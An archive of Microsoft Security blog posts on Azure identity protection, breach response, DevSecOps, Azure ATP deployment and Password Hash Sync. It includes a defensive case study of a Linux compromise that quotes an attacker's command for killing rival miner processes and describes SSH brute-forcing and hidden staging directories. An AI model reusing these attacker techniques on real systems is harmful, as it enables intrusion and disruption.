Category Archives: Azure Security

Investigating identity threats in hybrid cloud environments

As the modern workplace transforms, the identity attack surface area is growing exponentially, across on-premises and cloud, spanning a multitude of endpoints and applications. Security Operations (SecOps) teams are challenged to monitor user activities, suspicious or otherwise, across all dimensions of the identity attack surface, using multiple security solutions that often are not connected. Because identity protection is paramount for the modern workplace, investigating identity threats requires a single experience to monitor all user activities and hunt for suspicious behaviors in order to triage users quickly.

Today, Microsoft is announcing the new identity threat investigation experience, which correlates identity alerts and activities from Azure Advanced Threat Protection (Azure ATP), Azure Active Directory (Azure AD) Identity Protection, and Microsoft Cloud App Security into a single investigation experience for security analysts and hunters alike.

Modern identity attacks leverage hybrid cloud environments as a single attack surface

The identity threat investigation experience combines user identity signals from your on-premises and cloud services to close the gap between disparate signals in your environment and leverages state-of-the-art User and Entity Behavior Analytics (UEBA) capabilities to provide a risk score and rich contextual information for each user. It empowers security analysts to prioritize their investigations and reduce investigation times, ending the need to toggle between identity security solutions. This gives your SecOps teams more time and the right information to make better decisions and actively remediate identity threats and risks.

Azure ATP provides on-premises detections and activities with abnormal behavior analytics to assist in investigating the most at-risk users. Microsoft Cloud App Security detects and alerts security analysts to the potential of sensitive data exfiltration for first- and third-party cloud apps. And Azure AD Identity Protection detects unusual sign-in information, implementing conditional access on the compromised user until the issue is resolved. Combined, these services analyze the activities and alerts, using UEBA, to determine risky behaviors and provide you with an investigation priority score to streamline incident response for compromised identities.

To further simplify your SecOps workflows, we embedded the new experience into the Cloud App Security portal, regardless of whether you’re using Microsoft Cloud App Security today. While it enriches each alert with additional information, it also allows you to easily pivot from the correlated alert timeline directly into a deeper dive investigation and hunting experience.

User investigation priority

We’re adding a new dimension to the current investigation model that is based on the number of total alerts with a new user investigation priority, which is determined by all user activities and alerts that could indicate an active advanced attack or insider threat.

To calculate the user investigation priority, each abnormal event is scored based on the user’s profile history, their peers, and the organization. Additionally, the potential business and asset impact of any given user is analyzed to determine the investigation priority score.

The new concept is included on the updated user page, which provides relevant information about who the user is, the investigation priority score, how it compares across all users within the organization, and abnormal alerts and activities of the user.

In the image below, the user’s investigation priority score of 155 puts them in the top percentile within the organization, making them a top user for a security analyst to investigate.

Identity threat investigation user page.

The score is surfaced on the main dashboard to help you get an immediate idea of which users currently represent the highest risk within your organization and should be prioritized for further investigation.

Top users by investigation priority on the main dashboard.

Improved investigation and hunting experience

Beyond signal correlation and a redesigned user page, the new identity threat investigation experience also adds new and advanced investigation capabilities specifically for Azure ATP customers, regardless of whether you choose to use Azure AD Identity Protection and or Microsoft Cloud App Security.

These capabilities include the:

  • Ability for security analysts to perform threat hunting with greater context over both cloud and on-premises resources by leveraging advanced filtering capabilities and enriched alert information.
  • Visibility and management of Azure AD user risk levels with the ability to confirm compromised user status, which changes the Azure AD user risk level to High.
  • Creation of activity policies to determine governance actions and leverage built-in automation capabilities via the native integration with Microsoft Flow to more easily triage alerts.

New threat hunting experience to analyze alerts and activities.

Get started with the public preview today

If you’re one of the many enterprise customers already using Azure ATP, Microsoft Cloud App Security, and/or Azure AD Identity Protection and want to test the new identity threat investigation experience, get started by checking out our comprehensive technical documentation.

If you’re just starting your journey, begin a trial of Microsoft Threat Protection to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

We would love your feedback! Find us on the Azure ATP Tech Community and send us your questions or feedback on the new experience.

The post Investigating identity threats in hybrid cloud environments appeared first on Microsoft Security.

How to recover from a security breach

Experts estimate that ransomware attacks are up over 600 percent. For most companies, the issue isn’t if a cyberattack is going to happen, but when. Some security experts advise that the best way to recover from a security breach is to plan for it before it happens.

Today we take you through:

  • Strategies for building a plan for a cybersecurity attack.
  • Four tips for sharing information with your customers.
  • How to mitigate or prevent cyber incidents.

Strategies for building a plan for a cybersecurity attack

It’s natural to focus on technology and systems during a cyberattack, but it’s just as important to understand how your business is going to respond to the event—internally, to your customers, and to the general public. How do you escalate information and to whom? You often need to integrate input from communications, operations, IT, finance, and other departments. That’s why creating a plan is so important. You want to make sure you can respond quickly and have the right outcomes for your business priorities.

You also need to identify the impact on your systems. Understanding the technology impact during a breach often involves coming up with an internal security operations center (SOC) process flow, decision trees, and a communications escalation process that identifies when you get information, who is told about it, when are they told, and what they need do about it. We often place information into different categories to give us the opportunity to identify information and the business the chance to think things through and build the plan before there’s an actual incident.

Four tips for sharing information with your customers

Companies that contain a security breach in less than 30 days can save millions of dollars. That’s an incentive. But the impact of a breach is more than just financial—it impacts your reputation.

Here are four tips for responding to customers in an efficient, thoughtful way that can mitigate the damage of the attack:

  1. Deliver the right message to your customers after a breach—quickly. Companies used to have the luxury to wait and let the investigation play out before updating the public. Now there is the expectation that if a company has information, it’s doing a disservice to its customers by withholding it.
  2. Be simple and clear. This is where working with your communications team is essential. Practice your communications and response plan before it happens to learn how to improve.
  3. Be cautious. Being transparent and clear doesn’t mean that you have to say absolutely everything about the investigation. In technology, investigations can lead to additional discoveries. Make it clear that the investigation is ongoing and provide updates as the story unfolds. Don’t say anything that you wouldn’t stake your job on, because you might have to.
  4. Divulge any information that could benefit customers who have been affected by the breach and think beyond your business. In 2018, Under Armour reported that their fitness and nutrition app, MyFitnessPal, was hacked. Email and hashed passwords were stolen—affecting 150 million users. Under Armour advised customers to change the password for their app and anywhere it was used. That action demonstrated to customers that the company thought about the impact of the breach beyond their product.

Increasingly companies are expected to think about their customers beyond their specific relationship and consider how a data compromise impacts a customer’s relationship with other companies and accounts.

How to mitigate or prevent cyber incidents

The modern threat landscape is growing in sophistication and volume. As everything is becoming more digitized, there are more ways for bad actors to harm your company.

Here are some best practices that you can use to monitor your environment and combat threats:

Visibility is a key component to effective cybersecurity and monitoring. This includes having a good SOC and visibility into mobile users, remote workers, and business partners. The more you know about what’s happening on your network, including the cloud, the more effectively you can safeguard your environment.

Cyber hygiene and up-to-date security tools are necessities for businesses of all sizes.

  • Even if you’re a small or mid-size company, you can still have good security practices. You can have controls in place, outsource to a company, or work with your provider to get insight into your network. Microsoft Azure automatically gives you access to see what’s happening in your part of the cloud. Azure Security Center enables everybody to see what’s happening in a hybrid cloud environment. You don’t have to have a big cyber defense center to build good security practices.
  • Security solutions, such as Microsoft Threat Protection, provide multiple layers of threat protection across data, applications, devices, and identities and can help protect your company from advanced cyber threats. The security services in Microsoft Threat Protection, enriched by 6.5 trillion daily signals from the Microsoft Intelligent Security Graph, work together to mitigate today’s threats.

Get started

For more detail on actionable tips from security experts on how to recover after a data breach, watch the video, How to recover from a security breach.

The post How to recover from a security breach appeared first on Microsoft Security.

4 best practices to help you integrate security into DevOps

Microsoft’s transition of its corporate resources to the cloud required us to rethink how we integrate security into the agile development environment. In the old process, we often worked on 6- to 12-month development cycles for internal products. The security operations team was separate from the application development team and was responsible for ensuring that applications met security requirements. There was time to troubleshoot security between the two teams. Once we shifted to a shorter development cycle, we had to compress the new process to bake security into DevOps.

Our experience has led us to adopt four best practices that guide our thinking about integrating security with DevOps:

  1. Inventory your cloud resources.
  2. Establish a governance structure for cloud services.
  3. Give DevOps accountability for security.
  4. Redefine centralized security.

This post walks you through these tenets with some advice we hope you can apply to your own organization.

Inventory your cloud resources

Cloud subscriptions are so easy to spin up that many organizations don’t have a comprehensive understanding of which teams are using which services. This makes it challenging to manage your costs and enforce security policies. If you are uncertain which services you are currently paying for, billing is good place to start.

Establish a governance structure for cloud services

Once you understand your cloud inventory, you can begin the work of making sure your investments align with your business strategies. This may mean limiting which services your organization uses to maximize the ones that will help you meet your business goals. Then, align your organization to your cloud strategy by defining a governing structure:

  • Develop business scenarios that define acceptable use and configuration of cloud resources.
  • Define architecture and patterns for the cloud services you plan to use.
  • Limit who can create new subscriptions.

Give DevOps accountability for security

The only way to effectively enforce security policies in a short development cycle is to integrate security into the application development process. Early in our evolution, we dropped security team members into application development teams to create a single team with shared goals. This revealed cultural challenges and unexamined assumptions. Initially, both the application developers and the security team expected to conduct their jobs as they had in the past. Application developers wrote code and then security operations queued up issues to address. This proved unworkable for two reasons. Security analysts were queuing up too many security tasks to fit within the cycle. The application developers were often confused because security operations underestimated how well they understood the nuances of security.

The only way to meet our goals was to shift accountability for security to the DevOps teams. We wanted application developers to try to solve security issues as part of their process. This required education, but we also implemented some practices that encouraged the team to take on that responsibility:

  • Secure DevOps Kit for Azure—The Secure DevOps Kit for Azure provides scripts that can be configured for each resource. During development and before production, DevOps can easily validate that security controls are at the right level.
  • Security scorecard—The scorecard highlights which members of the team are skilled at addressing security and encourages people to improve and collaborate with each other.
  • Penetration testing—When a red team conducts a penetration test of an application, the results typically inspire the team to take security more seriously.

Redefine centralized security

We experimented with eliminating a central security team entirely, but ultimately, we realized that we needed a centralized team to monitor the big picture and set baselines. They establish our risk tolerance and measure security controls across subscriptions. They also automate as much of the security controls as they can. This includes configuring the Secure DevOps Kit for Azure. This team also needed training to better understand the vulnerabilities of the cloud. Tabletop exercises to talk through possible attacks with red teams was one way they got up to speed.

As our evolving process suggests, our biggest challenge was shifting culture and mindset. We recommend that you take time to define roles and start with a small team. You can expect to continuously discover better ways to improve teamwork and the security of your process and your applications.

Get started

For more details on how we evolved our security process for the cloud, watch the Speaking of security: Cloud migration webinar and get the Secure DevOps Kit for Azure.

The post 4 best practices to help you integrate security into DevOps appeared first on Microsoft Security.

Step 10. Detect and investigate security incidents: top 10 actions to secure your environment

“Step 10. Detect and investigate security incidents” is the final installment in the Top 10 actions to secure your environment blog series. Here we walk you through how to set up Azure Advanced Threat Protection (Azure ATP) to secure identities in the cloud and on-premises.

Azure ATP is a service in the Microsoft Threat Protection solution, which integrates with Azure Identity Protection and Microsoft Cloud App Security and leverages your on-premises Active Directory signals to identify suspicious user and device activity with both known-technique detection and behavioral analytics. It protects user identities and credentials stored in Active Directory and allows you to view clear attack information on a simple timeline for fast triage. Integration with Windows Defender Advanced Threat Protection (Windows Defender ATP) provides a single interface to monitor multiple entry points.

Azure ATP works by analyzing data sent by Azure ATP sensors that parse network traffic from domain controllers (Figure 1). In this blog, we share resources and advice that will help you install and configure the Azure ATP sensors following these steps:

  • Plan your Azure ATP capacity.
  • Install the Azure ATP sensor package.
  • Configure Azure ATP sensor.
  • Detect alerts.

Infographic showing the Azure ATP architecture: Azure ATP sensors parse network traffic from domain controllers and send it to Azure ATP for analysis.

Figure 1: Azure ATP sensors parse network traffic from domain controllers and send it to Azure ATP for analysis.

Plan your Azure ATP capacity

Before you begin your Azure ATP deployment, you’ll need to determine what resources are required to support your Azure ATP sensors. An Azure ATP sensor analyzes network traffic and reads events locally, without the need to purchase and maintain additional hardware or configurations. The Azure ATP sensor also supports Event Tracing for Windows (ETW), which provides the information for multiple detections. ETW-based detections include suspected DCShadow attacks that attempt to use domain controller replication requests and domain controller promotion.

The recommended and simplest way to determine capacity for your Azure ATP deployment is to use the Azure ATP sizing tool. Once you download and run the tool, the details in the “Busy Packets/sec” field will help you determine the resources required for your sensors.

Next, you create your Azure Advanced Threat Protection instance and connect to your Azure Directory forest. You’ll need an Azure Active Directory (Azure AD) tenant with at least one global/security administrator. Each Azure ATP instance supports a multiple Active Directory forest boundary and Forest Functional Level (FFL) of Windows 2003 and above.

Install the Azure ATP sensor package

Once Azure ATP is connected to Azure Directory, you can download the sensor package. Click Download from the Azure ATP portal to begin the process. You need to copy the access key for use when you install the sensor (Figure 2).

Screenshot showing the access key and sensor setup download button in the Azure Directory dash.

Figure 2: The access key is used in installation.

Next, verify the domain controller(s) on which you intend to install Azure ATP sensors have internet connectivity to the Azure ATP Cloud Service. These URLs automatically map to the correct service location for your Azure ATP instance:

  • For console connectivity: <your-instance-name>.atp.azure.com (For example, “Contoso-corp.atp.azure.com”)
  • For sensors connectivity: <your-instance-name>sensorapi.atp.azure.com (For example, “contoso-corpsensorapi.atp.azure.com”)

Note: There is no “.” Between <your-instance-name> and “sensorapi”.

Extract the files from the ZIP and run the Azure ATP sensor setup.exe, which initiates the installation wizard. When you get to the Configure the Sensor screen, enter the access key you copied during the download.

Note that all domain controllers in your environment should be covered by an Azure ATP sensor. The Azure ATP sensor supports the use of a proxy.

For more information on proxy configuration, see Configuring a proxy for Azure ATP.

Configure the Azure ATP sensor

The domain synchronizer is responsible for synchronization between Azure ATP and your Active Directory domain. Depending on the size of the domain, the initial synchronization may take time and is resource intensive. We recommend setting at least one domain controller as the domain synchronizer candidate per domain. This ensures Azure ATP is actively scanning your network at all times. By default, Azure ATP sensors aren’t domain synchronizer candidates. To manually set an Azure ATP sensor as a domain synchronizer candidate, switch the domain synchronizer candidate toggle option to ON in the configuration screen (Figure 3).

Screenshot showing the domain synchronizer candidate toggle switched to ON.

Figure 3: The domain synchronizer candidate toggle option set to ON in the configuration screen.

Next, manually tag groups or accounts as sensitive to enhance detections. This is important because some Azure ATP detections, such as sensitive group modification detection and lateral movement paths, rely on sensitive groups and accounts.

We also recommend that you integrate Azure ATP with Windows Defender ATP. Windows Defender ATP monitors your endpoints and the integration provides a single interface to monitor and protect your environment. It is easy to turn on the integration from the Azure ATP portal (Figure 4).

Screenshot showing the Integration with Windows Defender ATP toggle switched to ON.

Figure 4: A simple toggle enables integration with Windows Defender ATP.

You can also integrate with your VPN solution to collect additional user information, such as the IP addresses and locations where connections originated. This complements the investigation process by providing additional information on user activity as well as a new detection for abnormal VPN connections.

Detect alerts

After you set up Azure ATP, we recommend that you set up an Azure ATP security alert lab to help you better understand the alerts which may be generated in your environment. The lab includes a reconnaissance playbook that shows how Azure ATP identifies and detects suspicious activities from potential attacks. The lateral movement playbook allows you to see lateral movement path threat detections and security alerts services of Azure ATP. In the domain dominance playbook, you’ll simulate some common domain dominance methods. For best results set up your lab as close as possible to the instructions in the tutorial.

When Azure ATP is configured, you will be able to manage security alerts in the Security Alerts Timeline of the Azure ATP portal. Azure ATP security alerts provide tools to discover which suspicious activities were identified on your network and the actors and computers involved in the threats. Alerts are organized by threat phase, graded for severity, and color-coded to make them easy to visually filter.

Learn more

This completes our series, “Top 10 actions to secure your environment.” Review the entire series for advice on setting up other Microsoft 365 security products, such as Azure AD or Microsoft Cloud App Security.

Resources

The post Step 10. Detect and investigate security incidents: top 10 actions to secure your environment appeared first on Microsoft Security.

Demystifying Password Hash Sync

This blog is part of a series of posts providing a behind-the-scenes look of Microsoft’s Detection and Response Team (DART). While responding to cybersecurity incidents around the world, DART engages with customers who are wary about using Password Hash Sync (PHS) or are not utilizing this service’s full capabilities. As customers can gain tremendous security benefits using the full capabilities of this service, we want to demystify PHS.

What PHS is and is not

What is PHS? First, let’s start with what it is not. PHS doesn’t sync actual passwords. Rather, it syncs the hashes of passwords, which have all undergone a per-user salt and 1,000 iterations of the HMAC-SHA256 key hashing algorithm, before being sent to Azure Active Directory (Azure AD). Through our hands-on experiences, we’ve learned that many companies believe that Microsoft may have access to users’ passwords. Microsoft is committed to protecting your privacy, and it’s important to note that the SHA256 hash cannot be decrypted—so the plain-text version of the password is never and can never be exposed to Microsoft.

The second important consideration of PHS is that, with PHS your Identity Management provider is moved from your current provider to Azure AD. This allows the organization to move from an Identity Management provider—which is typically an on-premises server and requires maintenance and potentially server downtime—to a platform-as-a-service (PaaS) provider.

From a security perspective, organizations gain significant reliability advantages and improved capabilities by moving to PHS, including Smart Lockout, IP Lockout, and the ability to discover leaked credentials, as well as the benefits of utilizing Microsoft’s billions of worldwide data points as additional layers of security to your organization’s environment.

More about these key features:

  • Smart Lockout assists in blocking bad actors who are attempting to brute force passwords. By default, Smart Lockout locks the account from sign-in attempts for one minute after ten failed attempts. Smart Lockout tracks the last three bad password hashes to avoid re-incrementing the lockout counter. For more information Smart Lockout, see Azure AD Smart Lockout.
  • IP Lockout works by analyzing those billions of sign-ins to assess the quality of traffic from each IP address hitting Microsoft’s systems. With that analysis, IP Lockout finds IP addresses acting maliciously, such as an IP that is password spraying the tenant, and blocks those sign-ins in real-time, while allowing the real user to continue to successfully sign in.
  • Microsoft Leaked Credentials Service acquires username/password pairs by monitoring public web sites and the Dark Web and by working with:
    • Researchers
    • Law enforcement
    • Microsoft Security teams
    • Other trusted sources

When the service acquires username/password pairs, the passwords are sent through the same hashing algorithm and are checked against Azure AD users’ password hashes. When a match is found (indicating a compromised credential), a “Leaked Credentials Risk Event” is created. Please see Azure AD Risk Events for additional information regarding Leaked Credentials.

Another important benefit to PHS is that, should your tenant experience a Denial of Service (DoS) and/or Password Spray attack, Microsoft will take the brunt of that traffic. That traffic is directed at Microsoft, not your on-premises Active Directory Federated Services (AD FS). When authentication happens via on-premises AD FS your server is responsible for managing the load and potentially causing downtime.

Moving an organization’s identity management provider to Azure AD and utilizing Password Hash Sync allows for both an increase in overall security posture and reduced management overhead. The security benefits, including leaked credentials, IP lockout, and Smart Lockout, all utilize Microsoft’s telemetry that gives organizations the power of Microsoft’s intelligence.

NOTE: If PHS is the secondary authentication method and, if you choose to take advantage of Smart Lockout and IP Lockout, the primary authentication method must support these functionalities. PHS is recommended as secondary in a hybrid environment if Federated or Pass-through Authentication is primary as a redundancy mechanism, as well as the ability to collect information for Leaked Credentials.

Learn more

To learn more about DART, our engagements, and how they are delivered by experienced cybersecurity professionals who devote 100 percent of their time to providing cybersecurity solutions to customers worldwide, please contact your account executive. Also, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Read DART: the Microsoft cybersecurity team we hope you never meet for more about the DART team.

The post Demystifying Password Hash Sync appeared first on Microsoft Security.

Uncovering Linux based cyberattack using Azure Security Center

As more and more enterprises move to the cloud, they also bring their own set of security challenges. Today, almost half of Azure virtual machines (VMs) are running on Linux, and as the Linux server population grows, so are the attacks targeting them. As detection capabilities advance, attackers are using new and stealthier techniques to stay undetected and persist with their motives. Azure Security Center, Microsoft’s cloud-based cyber solution, helps customers safeguard their cloud workloads as well as protect them from these threats.

In this blog post, we detail a real-world Linux attack whose purpose initially looked like crypto mining, but it turned out that the attacker’s intent was to use the compromised host as a launchpad for further large-scale attacks.

Incident details

After the initial successful SSH brute force compromise, the attacker proceeds to download a first stage ‘tddwrt7s.sh’ script using utilities like ‘wget’ that delivers further payload to the host. Azure Security Center surfaces this behavior via a “Detected suspicious file download” alert.

Post stage 1 download, the attacker executed the script to find ‘dota.tar.gz’ by enumerating multiple hosting URLs. Once a live hosting IP was found, the second stage file gets delivered in directory ‘/tmp/.mountfs.’ Most of these exploitation and persistence techniques are observed from the /tmp folder. In this case all activities were tracked under /tmp/.mountfs and /tmp/.mountfs/.rsync directories. Creating directories with a dot keeps the activity hidden from the user interface, a common technique used by attackers.

Later, we see traffic to different mining pools including ‘mine.moneropool.com’ but nothing further that would confirm the purpose as mining cryptocurrency. The “Detected suspicious network activity” analytic triggered on this activity along with “Digital currency mining” analytic. This was followed by reconnaissance grep activity used by the attacker to get more information on the target machine to see if it had already been compromised and in use by other actors.

The attackers then used a bash script to search and kill processes on some of the above-mentioned miners that they grepped using command:

“ps auxf|grep -v grep|grep “xmrig” | awk ‘{print $2}’|xargs kill -9”

Let’s talk more about what this command does. The first command helps to show a tree view of parent-child processes in the output of ps (process status).The first grep removes the grep process from this list and the second grep will extract any xmrig (a well-known miner) process in the filtered list. Awk pattern matches the specified pattern and xargs executes the SIGKILL signal.

What follows next is a series of pkill commands to kill processes using couple of techniques that:

  1. Match the entire process and argument list pattern.
  2. Forcefully terminate a process.

To get the maximum CPU usage and efficiency, attackers generally start deleting the existing coin miner instances and focus on deploying new instances of mining payload.

Generally, after this activity, the traces of cryptocurrency wallet or other activities related to mining becomes evident but what followed next was a little surprise.

It turns out that this machine appeared to have been used to target 20,000 different endpoints based on our timeline of attack analysis detailed below:

Azure Security Center caught most of the suspicious activities observed above that triggered security alerts. To further our investigation, we collaborated with our internal memory forensics team. The analysis of the ELF payload unfolded even more details in this attack campaign:

  • The payload had three important components:
    • tsm64: An ELF executable.
    • Libraries that tsm64 relied on for execution.
    • tsm: Code used to launch the tsm64 executable.
  • To ensure that the attacker payload was able to run on most distributions, the attackers supplied the libraries tsm64, which was dependent on for successful execution.
  • tsm: tsm is ld.so renamed. ld.so is a helper program that loads the shared libraries needed by the program executable, prepares the program to run, and then runs it.
  • Dependent libraries: The dependency analysis of the tsm64 executable showed that it needed four libraries at the runtime. Namely, libpthread.so.0, libdl.so.2, libc.so.6, and ld-linux-x86-64.so.2.
  • tsm64: This is the executable that the attacker eventually wants to run. Turns out, tsm64 is a multi-threaded SSH brute force tool that can attack a set of IP’s with provided passwords.
  • The analysis of the Procedure Linkage Table (PLTs) for tsm64 showed the multi-threaded, network communication, and password file reading capabilities. A subset of the system apis are listed below:
    • Networking: setsockopt, getsockopt, getsockname, connect, gethostname, socket, inet_ntoa, recvfrom, recv, bind, getaddrinfo, inet_pton, getpeername
    • Multi-threaded (pthread): pthread_getspecific, pthread_setspecific, pthread_cond_signal, pthread_mutex_init, pthread_create, pthread_cond_init, pthread_key_delete, pthread_self, pthread_join, pthread_equal, pthread_cond_wait, pthread_detach, pthread_once, pthread_mutex_lock, pthread_key_create, pthread_mutex_destroy, pthread_cond_broadcast, pthread_mutex_unlock, pthread_kill
    • Password file entry: getpwnam, getpwnam_r, getpwuid_r
  • The IP address list and user credentials to be used for the brute force attack were downloaded into innocuous sounding file names ‘a’ and ‘b.’ File ‘a’ contained a list of 20,000 different IP addresses while file ‘b’ had a listing of credentials. These files were later renamed to ‘ip’ and ‘p’ respectively and passed into tsm64.
  • Using the inbuilt timeout utility, the tool was programmed to run for a maximum time of 90 minutes.

Adversaries are always finding new and novel ways to evade detection. As cyber defenders, we need to constantly innovate and track these latest threats in order to thwart new and deceptive attacks that are making rounds in the cloud cyber world.

Recommended actions

  • Azure Security Center can automatically correlate such multiple triggered alerts into a single security incident. This capability provides a single overview of any attack campaign and all the related alerts to understand the action attackers took and what resources were impacted.
  • While Azure Security Center alerted on the activity, the intrusion could have been prevented through good password hygiene. It’s recommended to utilize passwords and passphrases that are not easily guessed. Some of our previous blogs cover this topic: Just In Time (JIT) , Password-less sign-in, and Azure Key Vault.
  • Azure Security Center alerts can also be integrated in existing SIEM solution for a centralized view of security posture across your organization or with Microsoft’s new SIEM Azure Sentinel.

Learn more

To learn more about the Azure Security Center, see the following:

The post Uncovering Linux based cyberattack using Azure Security Center appeared first on Microsoft Security.

Ovum recommends Microsoft security to safeguard your hybrid and multi cloud environments

According to a new Ovum report, “[Azure Sentinel]…positions [Microsoft] to be a force for change in a security information and events management (SIEM) market that is ripe for disruption at the moment.” As enterprises migrate to the cloud, they’re increasingly operating on-premises and cloud environments spread across multiple cloud providers. These complex environments and multiple security products can make it challenging for security professionals to make correlations across their entire infrastructure and separate the signal from the noise.

The report, titled Microsoft’s Expanded Horizons in Security, written by Rik Turner and published in April 2019, evaluated Azure Sentinel among other new Microsoft services and determined that hybrid cloud customers who use Azure as one of their cloud providers should consider Microsoft for security across hybrid and multi cloud environments.

It has been noted by Ovum that in the last few years new services and capabilities have been introduced that support operating systems and platforms beyond Windows. The report identified the following reasons that Microsoft security products are appropriate, if you need to secure non-Microsoft products as well as Azure:

  • Password-less authentication and conditional access.
  • Microsoft Threat Protection secures identities, endpoints, user data, cloud apps, and infrastructure.
  • Microsoft Information Protection services extend to cloud apps with Microsoft Cloud App Security.
  • Azure Sentinel may disrupt the security management marketplace.

Azure for password-less authentication and conditional access

Active Directory and Azure Active Directory (Azure AD) are market leaders for on-premises and cloud-based directories that many enterprises already use. In addition to provisioning and deprovisioning, security capabilities such as modern authentication and conditional access make Azure AD a compelling choice for identity access management (IAM).

In recent years, Microsoft has introduced many capabilities to support modern authentication. Multi-Factor Authentication (MFA) or 2nd-Factor Authentication (2FA) allows you to enforce a secondary authentication method, so you don’t rely on passwords alone. Azure AD supports password-less authentication, such as biometrics and FIDO-2 compliant keys, and the Microsoft Authenticator mobile app, which generates a one-time passcode or push notification, can serve as a secondary authentication method.

Azure AD conditional access gives administrators additional control over who can access company resources both on the first access attempt and throughout the user session. Conditional access works by evaluating the circumstances of the authentication request—such as the device used, the location of the request, the user, or the network—to assign a risk score and then automatically apply pre-defined access polices.

For example, if a user attempts to access sensitive data from an unsecure network, Azure AD can block the request. If a user has been deemed likely compromised, Azure AD can require a password reset before allowing access.

Azure AD security policies aren’t just for Microsoft products. Integration with Microsoft Cloud App Security, a cloud access security broker (CASB) lets you extend authentication policies to all your cloud apps including non-Microsoft applications.

Microsoft Threat Protection secures identities, endpoints, user data, cloud apps, and infrastructure

Recent acquisitions and the Microsoft Intelligent Security Graph give Microsoft the data and technology to provide protection across identities, endpoints, emails, messages, documents, cloud applications, and infrastructure. The Intelligent Security Graph gathers threat information from Microsoft products deployed around the world, security partners, and Microsoft’s own security team. To make sense of trillions of signals, machine learning and artificial intelligence (AI) algorithms analyze the data to find correlations and patterns. The Microsoft Threat Protection suite of products uses analysis from the Microsoft Intelligence Security Graph to learn what is normal user behavior, so that it can detect and alert or block anomalous behavior.

Microsoft Information Protection services extend to cloud apps with Microsoft Cloud App Security

Microsoft Information Protection helps secure data at-rest in file repositories, cloud storage services, and on users’ devices. It protects data in motion as it moves or travels to different locations. The service accomplishes this with four steps: detection, classification, protection, and monitoring. Microsoft Information Protection is able to detect sensitive data across on-premises and cloud repositories. Once the data is detected, Microsoft Information Protection classifies and labels it based on a pre-defined taxonomy that identifies how sensitive the data is, such as “Highly Confidential” or “Non Business.” Protection is applied based on the classification and can include actions such as file encryption. You can set policies to prevent copy and save functions, among other protections. Monitoring capabilities allow administrators to track the document as it moves inside and outside of your organization.

Microsoft Cloud App Security integrates with Microsoft Information Protection to extend the discovery, classification, protection, and monitoring capabilities to cloud apps. Administrators can even quarantine a file or limit sharing after it has moved to non-Microsoft cloud services.

Azure Sentinel may disrupt the security management marketplace

Ovum’s report identifies opportunities to offer better products in security management, especially SIEM platforms and products. SEIMs aggregate log files into one repository, so security teams can analyze the data and remediate detected threats. As the amount of data has increased, the need to augment the SIEMs with more robust analytics capabilities has exploded. SIEMs charge a lot to store log files, and customers are overwhelmed by the number of alerts, many of them false positives generated by their SIEM platforms.

Azure Sentinel can save time, reduce costs, and reduce alert fatigue by using AI and machine learning models to sift through the noise and more accurately identify real threats. Azure Sentinel currently aggregates data from Office 365 apps and data from security partners. In pilot tests, it reduced alert fatigue by as much as 90 percent.

Microsoft’s other security management offerings can help customers manage security across a diverse cloud ecosystem. Azure Security Manager helps customers stay compliant with regulations, identifies security vulnerabilities, and detects and blocks threats. Later this year, these capabilities will be extended to Amazon Web Services (AWS) and eventually Google Cloud Provider (GCP).

Learn more

The report offers several examples of how Microsoft is evolving its security strategy to support the complex environments that enterprises must secure. Ovum expects that Microsoft will continue to expand the number of products that secure multiple platforms as it provides more support for Mac, Linux, AWS, and GCP.

Read the Ovum report to learn more about how Microsoft’s current offering and strategy makes it a good fit for current Azure customers who have a mix of on-premises and clouds and/or use two or more cloud service providers.

The post Ovum recommends Microsoft security to safeguard your hybrid and multi cloud environments appeared first on Microsoft Security.

Identity enhancements to support the more than 1 million active third-party applications on our platform

This week at //build 2019, we’re announcing several enhancements to our identity platform for developers. These enhancements are designed to support the more than one million active third-party applications using our identity platform each month and include:

  • Our work to unify the Microsoft identity platform across personal accounts and Azure Active Directory (Azure AD) accounts.
  • Our new unified app registrations portal.
  • The Microsoft Authentication Libraries.
  • Ability to use your GitHub identity to sign in to Microsoft products.

Head over the Identity blog for a closer look at these enhancements for developers. If you’re at //build this week stop by the Microsoft identity platform and Azure AD booths.

The post Identity enhancements to support the more than 1 million active third-party applications on our platform appeared first on Microsoft Security.